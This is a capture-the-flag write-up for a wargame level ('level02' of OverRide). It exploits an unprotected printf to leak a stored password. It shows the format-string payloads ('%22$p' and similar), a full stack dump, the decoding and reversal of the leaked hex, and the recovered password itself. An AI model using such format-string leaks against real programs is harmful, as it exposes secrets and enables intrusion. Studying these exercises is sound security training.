Introduction:

This program open .pass of level03 and ask u user name and password to login at and it will be start to you a /bin/sh

But we don't have this password so we'll try to bypass this. 

We see that there is printf non protected maybe we can read memory

STEP 1: 
Try to read and locate were is our token
                        try for 100 paremeter           num  - value
                    <------------------------->          <------------>
level02@OverRide:~$ for(( i = 1; i < 100; i++)); do echo "$i - %$i\$p" | ./level02 | grep "does not have acces"; done
1 - 0x7fffffffe4a0 does not have access!
2 - (nil) does not have access!
3 - (nil) does not have access!
4 - 0x2a2a2a2a2a2a2a2a does not have access!
5 - 0x2a2a2a2a2a2a2a2a does not have access!
6 - 0x7fffffffe698 does not have access!
7 - 0x1f7ff9a08 does not have access!
8 - (nil) does not have access!
9 - (nil) does not have access!
10 - (nil) does not have access!
11 - (nil) does not have access!
12 - (nil) does not have access!
13 - (nil) does not have access!
14 - (nil) does not have access!
15 - (nil) does not have access!
16 - (nil) does not have access!
17 - (nil) does not have access!
18 - (nil) does not have access!
19 - (nil) does not have access!
20 - 0x100000000 does not have access!
21 - (nil) does not have access!
22 - 0x756e505234376848 does not have access! <--------------
23 - 0x45414a3561733951 does not have access!
24 - 0x377a7143574e6758 does not have access!                      Seems cool 
25 - 0x354a35686e475873 does not have access!
26 - 0x48336750664b394d does not have access! <------------
27 - (nil) does not have access!
28 - 0x383225202d203832 does not have access!
29 - 0x7024 does not have access!
30 - (nil) does not have access!
31 - (nil) does not have access!
32 - (nil) does not have access!
33 - (nil) does not have access!
34 - (nil) does not have access!
35 - (nil) does not have access!
36 - (nil) does not have access!
37 - (nil) does not have access!
38 - (nil) does not have access!
39 - (nil) does not have access!
40 - 0x2900000000 does not have access!
41 - 0x602010 does not have access!
42 - (nil) does not have access!
43 - 0x7ffff7a3d7ed does not have access!
44 - (nil) does not have access!
45 - 0x7fffffffe698 does not have access!
46 - 0x100000000 does not have access!
47 - 0x400814 does not have access!
48 - (nil) does not have access!
49 - 0x7c67c0964807fcc0 does not have access!
50 - 0x400730 does not have access!
51 - 0x7fffffffe690 does not have access!
52 - (nil) does not have access!
53 - (nil) does not have access!
54 - 0xbfe5aefdd1fa4e35 does not have access!
55 - 0x7c2434e90e44e341 does not have access!
56 - 0x7fff00000000 does not have access!
57 - (nil) does not have access!
58 - (nil) does not have access!
59 - 0x400ac0 does not have access!
60 - 0x7fffffffe698 does not have access!
61 - 0x1 does not have access!
62 - (nil) does not have access!
63 - (nil) does not have access!
64 - 0x400730 does not have access!
65 - 0x7fffffffe690 does not have access!
66 - (nil) does not have access!
67 - 0x400759 does not have access!
68 - 0x7fffffffe688 does not have access!
69 - 0x1c does not have access!
70 - 0x1 does not have access!
71 - 0x7fffffffe8b7 does not have access!
72 - (nil) does not have access!
73 - 0x7fffffffe8c1 does not have access!
74 - 0x7fffffffe8d5 does not have access!
75 - 0x7fffffffe8e5 does not have access!
76 - 0x7fffffffe908 does not have access!
77 - 0x7fffffffe91b does not have access!
78 - 0x7fffffffe928 does not have access!
79 - 0x7fffffffee49 does not have access!
80 - 0x7fffffffee60 does not have access!
81 - 0x7fffffffeead does not have access!
82 - 0x7fffffffeec5 does not have access!
83 - 0x7fffffffeed6 does not have access!
84 - 0x7fffffffeede does not have access!
85 - 0x7fffffffeef7 does not have access!
86 - 0x7fffffffef09 does not have access!
87 - 0x7fffffffef23 does not have access!
88 - 0x7fffffffef33 does not have access!
89 - 0x7fffffffef67 does not have access!
90 - 0x7fffffffef76 does not have access!
91 - 0x7fffffffef96 does not have access!
92 - 0x7fffffffefa9 does not have access!
93 - 0x7fffffffefcb does not have access!
94 - 0x7fffffffefd7 does not have access!
95 - (nil) does not have access!
96 - 0x21 does not have access!
97 - 0x7ffff7ffa000 does not have access!
98 - 0x10 does not have access!
99 - 0x178bfbff does not have access!

We want to know what is on the address so we check with this link https://simplycalc.com/base16-decode.php
To decode value. But it doesn't not work
we got this : H3gPfK9M5J5hnGXs7zqCWNgXEAJ5as9QunPR47hH

We saw that in 28 position we've got "82% - 82" seem like our parameter but reverse
So we'll use this : https://codebeautify.org/reverse-string to reverse our string and our password 
Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
IT WORKS !! 

-----------------------------------------------------------------------------------------------------------------------
level02@OverRide:~$ ./level02
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: %22$p %23$p %24$p %25$p %26$p %27$
--[ Password:
*****************************************
0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d % does not have access!

level02@OverRide:~$ su level03
Password:
su: Authentication failure
level02@OverRide:~$ su level03
Password:
su: Authentication failure
level02@OverRide:~$ su level03
Password:
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   /home/users/level03/level03
level03@OverRide:~$
--------------------------------------------------------------------------------------------------------------------------

https://simplycalc.com/base16-decode.php : 48336750664b394d354a35686e475873377a7143574e675845414a3561733951756e505234376848
https://codebeautify.org/reverse-string: H3gPfK9M5J5hnGXs7zqCWNgXEAJ5as9QunPR47hH
Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
